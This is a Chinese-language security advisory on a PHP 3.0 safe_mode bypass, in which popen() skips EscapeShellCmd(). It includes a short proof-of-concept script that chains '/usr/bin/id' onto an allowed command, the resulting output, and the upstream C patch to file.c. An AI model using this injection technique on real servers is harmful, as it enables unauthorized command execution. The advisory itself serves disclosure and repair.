受影響的系統(tǒng):;;PHP 3.00;;-------------------------------------------------------------------------------- 描述: ;;;;;;PHP Version 3.0是一個HTML嵌入式腳本語言。其大多數(shù)語法移植于C、Java和Perl并結合了 PHP的特色。這個語言可以讓web開發(fā)者快速創(chuàng)建動態(tài)網(wǎng)頁。 ;;;;;;;因其執(zhí)行在web服務器上并允許用戶執(zhí)行代碼，PHP內(nèi)置了稱為'safe_mode'的安全特性， 用于控制在允許PHP操作的webroot環(huán)境中執(zhí)行命令。 ;;;;;;;其實現(xiàn)機制是通過強制執(zhí)行shell命令的系統(tǒng)調(diào)用將shell命令傳送到EscapeShellCmd() 函數(shù)，此函數(shù)用于確認在webroot目錄外部不能執(zhí)行命令。 ;;;;;;;在某些版本的PHP中，使用popen()命令時EscapeShellCmd()卻失效了，造成惡意用戶可 以利用'popen'系統(tǒng)調(diào)用進行非法操作。 ;;-------------------------------------------------------------------------------- 測試程序： ;;警 告：以下程序(方法)可能帶有攻擊性，僅供安全研究與教學之用。使用者風險自負！ ;;＜?php $fp = popen("ls -l /opt/bin; /usr/bin/id", "r"); echo "$fp＜br＞n"while($line = fgets($fp, 1024)): printf("%s＜br＞n", $line); endwhile; pclose($fp); phpinfo(); ?＞ ;;;輸出結果如下： ;;;1 total 53;;-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls;;uid=30(wwwrun) gid=65534(nogroup) groups=65534(nogroup);;and from the configuration values of phpinfo(): safe_mode 0 1;;-------------------------------------------------------------------------------- 建議:;;Index: functions/file.c =================================================================== RCS file: /repository/php3/functions/file.c,v retrieving revision 1.229 retrieving revision 1.230 diff -u -r1.229 -r1.230 --- functions/file.c 2000/01/01 04:31:15 1.229 +++ functions/file.c 2000/01/03 21:31:31 1.230 @@ -26,7 +26,7 @@ | Authors: Rasmus Lerdorf ＜[email protected]＞ | +----------------------------------------------------------------------+ */ /* $Id: file.c,v 1.229 2000/01/01 04:31:15 sas Exp $ */ +/* $Id: file.c,v 1.230 2000/01/03 21:31:31 kk Exp $ */ #include "php.h" #include ＜stdio.h＞ @@ -51,6 +51,7 @@ #include "safe_mode.h" #include "php3_list.h" #include "php3_string.h" +#include "exec.h" #include "file.h" #if HAVE_PWD_H #if MSVC5 @@ -575,7 +576,7 @@ pval *arg1, *arg2; FILE *fp; int id; - char *p; + char *p, *tmp = NULL; char *b, buf[1024]; TLS_VARS; ;;;@@ -600,7 +601,11 @@ } else { snprintf(buf,sizeof(buf),"%s/%s",php3_ini.safe_mode_exec_dir,arg1-＞value.str.val); } ;;;- fp = popen(buf,p); ;;;+ + tmp = _php3_escapeshellcmd(buf); + fp = popen(tmp,p); + efree(tmp); /* temporary copy, no longer necessary */ + if (!fp) { php3_error(E_WARNING,"popen("%s","%s") - %s",buf,p,strerror(errno)); RETURN_FALSE;;;